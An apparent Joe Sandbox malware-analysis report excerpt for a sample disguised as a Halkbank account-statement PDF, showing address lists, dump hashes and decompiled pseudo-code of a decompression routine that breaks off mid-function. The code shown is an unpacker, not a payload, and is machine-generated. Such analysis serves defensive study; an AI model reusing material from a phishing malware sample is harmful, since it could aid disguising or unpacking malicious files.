                                          0x00407410
                                          0x004073e2
                                          0x004073e2
                                          0x004073f1
                                          0x004073f5
                                          0x004073f5
                                          0x0040741a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406d5f
                                          0x00406d61
                                          0x00406d64
                                          0x00406dd5
                                          0x00406dd8
                                          0x00406ddb
                                          0x00406de2
                                          0x00406dec
                                          0x004073cb
                                          0x004073cb
                                          0x00000000
                                          0x004073cb
                                          0x00406d66
                                          0x00406d6a
                                          0x00406d6d
                                          0x00406d6f
                                          0x00406d72
                                          0x00406d75
                                          0x00406d77
                                          0x00406d7a
                                          0x00406d7c
                                          0x00406d81
                                          0x00406d84
                                          0x00406d87
                                          0x00406d8b
                                          0x00406d92
                                          0x00406d95
                                          0x00406d9c
                                          0x00406da0
                                          0x00406da8
                                          0x00406da8
                                          0x00406da8
                                          0x00406da2
                                          0x00406da2
                                          0x00406da2
                                          0x00406d97
                                          0x00406d97
                                          0x00406d97
                                          0x00406dac
                                          0x00406daf
                                          0x00406dcd
                                          0x00406dcf
                                          0x00000000
                                          0x00406db1
                                          0x00406db1
                                          0x00406db4
                                          0x00406db7
                                          0x00406dba
                                          0x00406dbc
                                          0x00406dbc
                                          0x00406dbc
                                          0x00406dbf
                                          0x00406dc2
                                          0x00406dc4
                                          0x00406dc5
                                          0x00406dc8
                                          0x00000000
                                          0x00406dc8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00407068
                                          0x0040706c
                                          0x0040708f
                                          0x00407092
                                          0x00407095
                                          0x0040709f
                                          0x0040706e
                                          0x0040706e
                                          0x00407071
                                          0x00407074
                                          0x00407077
                                          0x00407084
                                          0x00407087
                                          0x00407087
                                          0x004073cb
                                          0x004073cb
                                          0x004073cb
                                          0x00000000
                                          0x004073cb
                                          0x00000000
                                          0x004070ab
                                          0x004070af
                                          0x00000000
                                          0x00000000
                                          0x004070b5
                                          0x004070b9
                                          0x00000000
                                          0x00000000
                                          0x004070bf
                                          0x004070c1
                                          0x004070c5
                                          0x004070c5
                                          0x004070c8
                                          0x004070cc
                                          0x00000000
                                          0x00000000
                                          0x0040711c
                                          0x00407120
                                          0x00407127
                                          0x0040712a
                                          0x0040712d
                                          0x00407137
                                          0x004073cb
                                          0x004073cb
                                          0x004073cb
                                          0x00000000
                                          0x004073cb
                                          0x004073cb
                                          0x00407122
                                          0x00000000
                                          0x00000000
                                          0x00407143
                                          0x00407147
                                          0x0040714e
                                          0x00407151
                                          0x00407154
                                          0x00407149
                                          0x00407149
                                          0x00407149
                                          0x00407157
                                          0x0040715a
                                          0x0040715d
                                          0x0040715d
                                          0x00407160
                                          0x00407163
                                          0x00407166
                                          0x00407166
                                          0x00407169
                                          0x00407170
                                          0x00407175
                                          0x00000000
                                          0x00000000
                                          0x00407203
                                          0x00407203
                                          0x00407207
                                          0x004075a5
                                          0x00000000
                                          0x004075a5
                                          0x0040720d
                                          0x00407210
                                          0x00407213
                                          0x00407217
                                          0x0040721a
                                          0x00407220
                                          0x00407222
                                          0x00407222
                                          0x00407222
                                          0x00407225
                                          0x00407228
                                          0x00000000
                                          0x00000000
                                          0x00406df8
                                          0x00406df8
                                          0x00406dfc
                                          0x00407569
                                          0x00000000
                                          0x00407569
                                          0x00406e02
                                          0x00406e05
                                          0x00406e08
                                          0x00406e0c
                                          0x00406e0f
                                          0x00406e15
                                          0x00406e17
                                          0x00406e17
                                          0x00406e17
                                          0x00406e1a
                                          0x00406e1d
                                          0x00406e1d
                                          0x00406e20
                                          0x00406e23
                                          0x00000000
                                          0x00000000
                                          0x00406e29
                                          0x00406e2f
                                          0x00000000
                                          0x00000000
                                          0x00406e35
                                          0x00406e35
                                          0x00406e39
                                          0x00406e3c
                                          0x00406e3f
                                          0x00406e42
                                          0x00406e45
                                          0x00406e46
                                          0x00406e49
                                          0x00406e4b
                                          0x00406e51
                                          0x00406e54
                                          0x00406e57
                                          0x00406e5a
                                          0x00406e5d
                                          0x00406e60
                                          0x00406e63
                                          0x00406e7f
                                          0x00406e82
                                          0x00406e85
                                          0x00406e88
                                          0x00406e8f
                                          0x00406e93
                                          0x00406e95
                                          0x00406e99
                                          0x00406e65
                                          0x00406e65
                                          0x00406e69
                                          0x00406e71
                                          0x00406e76
                                          0x00406e78
                                          0x00406e7a
                                          0x00406e7a
                                          0x00406e9c
                                          0x00406ea3
                                          0x00406ea6
                                          0x00000000
                                          0x00406eac
                                          0x00000000
                                          0x00406eac
                                          0x00000000
                                          0x00406eb1
                                          0x00406eb1
                                          0x00406eb5
                                          0x00407575
                                          0x00000000
                                          0x00407575
                                          0x00406ebb
                                          0x00406ebe
                                          0x00406ec1
                                          0x00406ec5
                                          0x00406ec8
                                          0x00406ece
                                          0x00406ed0
                                          0x00406ed0
                                          0x00406ed0
                                          0x00406ed3
                                          0x00406ed6
                                          0x00406ed6
                                          0x00406ed6
                                          0x00406edc
                                          0x00000000
                                          0x00000000
                                          0x00406ede
                                          0x00406ee1
                                          0x00406ee4
                                          0x00406ee7
                                          0x00406eea
                                          0x00406eed
                                          0x00406ef0
                                          0x00406ef3
                                          0x00406ef6
                                          0x00406ef9
                                          0x00406efc
                                          0x00406f14
                                          0x00406f17
                                          0x00406f1a
                                          0x00406f1d
                                          0x00406f1d
                                          0x00406f20
                                          0x00406f24
                                          0x00406f26
                                          0x00406efe
                                          0x00406efe
                                          0x00406f06
                                          0x00406f0b
                                          0x00406f0d
                                          0x00406f0f
                                          0x00406f0f
                                          0x00406f29
                                          0x00406f30
                                          0x00406f33
                                          0x00000000
                                          0x00406f35
                                          0x00000000
                                          0x00406f35
                                          0x00406f33
                                          0x00406f3a
                                          0x00406f3a
                                          0x00406f3a
                                          0x00406f3a
                                          0x00000000
                                          0x00000000
                                          0x00406f75
                                          0x00406f75
                                          0x00406f79
                                          0x00407581
                                          0x00000000
                                          0x00407581
                                          0x00406f7f
                                          0x00406f82
                                          0x00406f85
                                          0x00406f89
                                          0x00406f8c
                                          0x00406f92
                                          0x00406f94
                                          0x00406f94
                                          0x00406f94
                                          0x00406f97
                                          0x00406f9a
                                          0x00406f9a
                                          0x00406fa0
                                          0x00406f3e
                                          0x00406f3e
                                          0x00406f41
                                          0x00000000
                                          0x00406f41
                                          0x00406fa2
                                          0x00406fa2
                                          0x00406fa5
                                          0x00406fa8
                                          0x00406fab
                                          0x00406fae
                                          0x00406fb1
                                          0x00406fb4
                                          0x00406fb7
                                          0x00406fba
                                          0x00406fbd
                                          0x00406fc0
                                          0x00406fd8
                                          0x00406fdb
                                          0x00406fde
                                          0x00406fe1
                                          0x00406fe1
                                          0x00406fe4
                                          0x00406fe8
                                          0x00406fea
                                          0x00406fc2
                                          0x00406fc2
                                          0x00406fca
                                          0x00406fcf
                                          0x00406fd1
                                          0x00406fd3
                                          0x00406fd3
                                          0x00406fed
                                          0x00406ff4
                                          0x00406ff7
                                          0x00000000
                                          0x00406ff9
                                          0x00000000
                                          0x00406ff9
                                          0x00000000
                                          0x00407286
                                          0x00407286
                                          0x0040728a
                                          0x004075b1
                                          0x00000000
                                          0x004075b1
                                          0x00407290
                                          0x00407293
                                          0x00407296
                                          0x0040729a
                                          0x0040729d
                                          0x004072a3
                                          0x004072a5
                                          0x004072a5
                                          0x004072a5
                                          0x004072a8
                                          0x00000000
                                          0x00000000
                                          0x00407056
                                          0x00407056
                                          0x00407059
                                          0x004073cb
                                          0x004073cb
                                          0x004073cb
                                          0x00000000
                                          0x004073cb
                                          0x00000000
                                          0x00407395
                                          0x00407399
                                          0x004073bb
                                          0x004073be
                                          0x004073c8
                                          0x004073cb
                                          0x004073cb
                                          0x004073cb
                                          0x00000000
                                          0x004073cb
                                          0x004073cb
                                          0x0040739b
                                          0x0040739e
                                          0x004073a2
                                          0x004073a5
                                          0x004073a5
                                          0x004073a8
                                          0x00000000
                                          0x00000000
                                          0x00407452
                                          0x00407456
                                          0x00407474
                                          0x00407474
                                          0x00407474
                                          0x0040747b
                                          0x00407482
                                          0x00407489
                                          0x00407489
                                          0x00000000
                                          0x00407489
                                          0x00407458
                                          0x0040745b
                                          0x0040745e
                                          0x00407461
                                          0x00407468
                                          0x004073ac
                                          0x004073ac
                                          0x004073af
                                          0x00000000
                                          0x00000000
                                          0x00407543
                                          0x00407546
                                          0x00407447
                                          0x00000000
                                          0x00000000
                                          0x0040717d
                                          0x0040717f
                                          0x00407186
                                          0x00407187
                                          0x00407189
                                          0x0040718c
                                          0x00000000
                                          0x00000000
                                          0x00407194
                                          0x00407197
                                          0x0040719a
                                          0x0040719c
                                          0x0040719e
                                          0x0040719e
                                          0x0040719f
                                          0x004071a2
                                          0x004071a9
                                          0x004071ac
                                          0x004071ba
                                          0x00000000
                                          0x00000000
                                          0x00407490
                                          0x00407490
                                          0x00407493
                                          0x0040749a
                                          0x00000000
                                          0x00000000
                                          0x0040749f
                                          0x0040749f
                                          0x004074a3
                                          0x004075db
                                          0x00000000
                                          0x004075db
                                          0x004074a9
                                          0x004074ac
                                          0x004074af
                                          0x004074b3
                                          0x004074b6
                                          0x004074bc
                                          0x004074be
                                          0x004074be
                                          0x004074be
                                          0x004074c1
                                          0x004074c4
                                          0x004074c4
                                          0x004074c4
                                          0x004074c4
                                          0x004074c7
                                          0x004074c7
                                          0x004074cb
                                          0x0040752b
                                          0x0040752e
                                          0x00407533
                                          0x00407534
                                          0x00407536
                                          0x00407538
                                          0x0040753b
                                          0x00407447
                                          0x00407447
                                          0x00000000
                                          0x0040744d
                                          0x00407447
                                          0x004074cd
                                          0x004074d3
                                          0x004074d6
                                          0x004074d9
                                          0x004074dc
                                          0x004074df
                                          0x004074e2
                                          0x004074e5
                                          0x004074e8
                                          0x004074eb
                                          0x004074ee
                                          0x00407507
                                          0x0040750a
                                          0x0040750d
                                          0x00407510
                                          0x00407514
                                          0x00407516
                                          0x00407516
                                          0x00407517
                                          0x0040751a
                                          0x004074f0
                                          0x004074f0
                                          0x004074f8
                                          0x004074fd
                                          0x004074ff
                                          0x00407502
                                          0x00407502
                                          0x0040751d
                                          0x00407524
                                          0x00000000
                                          0x00407526
                                          0x00000000
                                          0x00407526
                                          0x00000000
                                          0x004071c2
                                          0x004071c5
                                          0x004071fb
                                          0x0040732b
                                          0x0040732b
                                          0x0040732b
                                          0x0040732b
                                          0x0040732e
                                          0x0040732e
                                          0x00407331
                                          0x00407333
                                          0x004075bd
                                          0x00000000
                                          0x004075bd
                                          0x00407339
                                          0x0040733c
                                          0x00000000
                                          0x00000000
                                          0x00407342
                                          0x00407346
                                          0x00407349
                                          0x00407349
                                          0x00407349
                                          0x00000000
                                          0x00407349
                                          0x004071c7
                                          0x004071c9
                                          0x004071cb
                                          0x004071cd
                                          0x004071d0
                                          0x004071d1
                                          0x004071d3
                                          0x004071d5
                                          0x004071d8
                                          0x004071db
                                          0x004071f1
                                          0x004071f6
                                          0x0040722e
                                          0x0040722e
                                          0x00407232
                                          0x0040725e
                                          0x00407260
                                          0x00407267
                                          0x0040726a
                                          0x0040726d
                                          0x0040726d
                                          0x00407272
                                          0x00407272
                                          0x00407274
                                          0x00407277
                                          0x0040727e
                                          0x00407281
                                          0x004072ae
                                          0x004072ae
                                          0x004072b1
                                          0x004072b4
                                          0x00407328
                                          0x00407328
                                          0x00407328
                                          0x00000000
                                          0x00407328
                                          0x004072b6
                                          0x004072bc
                                          0x004072bf
                                          0x004072c2
                                          0x004072c5
                                          0x004072c8
                                          0x004072cb
                                          0x004072ce
                                          0x004072d1
                                          0x004072d4
                                          0x004072d7
                                          0x004072f0
                                          0x004072f2
                                          0x004072f5
                                          0x004072f6
                                          0x004072f9
                                          0x004072fb
                                          0x004072fe
                                          0x00407300
                                          0x00407302
                                          0x00407305
                                          0x00407307
                                          0x0040730a
                                          0x0040730e
                                          0x00407310
                                          0x00407310
                                          0x00407311
                                          0x00407314
                                          0x00407317
                                          0x004072d9
                                          0x004072d9
                                          0x004072e1
                                          0x004072e6
                                          0x004072e8
                                          0x004072eb
                                          0x004072eb
                                          0x0040731a
                                          0x00407321
                                          0x004072ab
                                          0x004072ab
                                          0x004072ab
                                          0x004072ab
                                          0x00000000
                                          0x00407323
                                          0x00000000
                                          0x00407323
                                          0x00407321
                                          0x00407234
                                          0x00407237
                                          0x00407239
                                          0x0040723c
                                          0x0040723f
                                          0x00407242
                                          0x00407244
                                          0x00407247
                                          0x0040724a
                                          0x0040724a
                                          0x0040724d
                                          0x0040724d
                                          0x00407250
                                          0x00407257
                                          0x0040722b
                                          0x0040722b
                                          0x0040722b
                                          0x0040722b
                                          0x00000000
                                          0x00407259
                                          0x00000000
                                          0x00407259
                                          0x00407257
                                          0x004071dd
                                          0x004071e0
                                          0x004071e2
                                          0x004071e5
                                          0x00000000
                                          0x00000000
                                          0x00406f44
                                          0x00406f44
                                          0x00406f48
                                          0x0040758d
                                          0x00000000
                                          0x0040758d
                                          0x00406f4e
                                          0x00406f51
                                          0x00406f54
                                          0x00406f57
                                          0x00406f5a
                                          0x00406f5d
                                          0x00406f60
                                          0x00406f62
                                          0x00406f65
                                          0x00406f68
                                          0x00406f6b
                                          0x00406f6d
                                          0x00406f6d
                                          0x00406f6d
                                          0x00000000
                                          0x00000000
                                          0x004070cf
                                          0x004070cf
                                          0x004070d3
                                          0x00407599
                                          0x00000000
                                          0x00407599
                                          0x004070d9
                                          0x004070dc
                                          0x004070df
                                          0x004070e2
                                          0x004070e4
                                          0x004070e4
                                          0x004070e4
                                          0x004070e7
                                          0x004070ea
                                          0x004070ed
                                          0x004070f0
                                          0x004070f3
                                          0x004070f6
                                          0x004070f7
                                          0x004070f9
                                          0x004070f9
                                          0x004070f9
                                          0x004070fc
                                          0x004070ff
                                          0x00407102
                                          0x00407105
                                          0x00407105
                                          0x00407105
                                          0x00407108
                                          0x0040710a
                                          0x0040710a
                                          0x00000000
                                          0x00000000
                                          0x0040734c
                                          0x0040734c
                                          0x0040734c
                                          0x00407350
                                          0x00000000
                                          0x00000000
                                          0x00407356
                                          0x00407359
                                          0x0040735c
                                          0x0040735f
                                          0x00407361
                                          0x00407361
                                          0x00407361
                                          0x00407364
                                          0x00407367
                                          0x0040736a
                                          0x0040736d
                                          0x00407370
                                          0x00407373
                                          0x00407374
                                          0x00407376
                                          0x00407376
                                          0x00407376
                                          0x00407379
                                          0x0040737c
                                          0x0040737f
                                          0x00407382
                                          0x00407385
                                          0x00407389
                                          0x0040738b
                                          0x0040738e
                                          0x00000000
                                          0x00407390
                                          0x0040710d
                                          0x0040710d
                                          0x00000000
                                          0x0040710d
                                          0x0040738e
                                          0x004075c3
                                          0x00000000
                                          0x00000000
                                          0x00406bf2
                                          0x004075fa
                                          0x004075fa
                                          0x00000000
                                          0x004075fa
                                          0x00407447
                                          0x004073ce
                                          0x004073cb
                                          0x00000000
                                          0x00407002

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                          • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                          • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                          • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E0040711C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
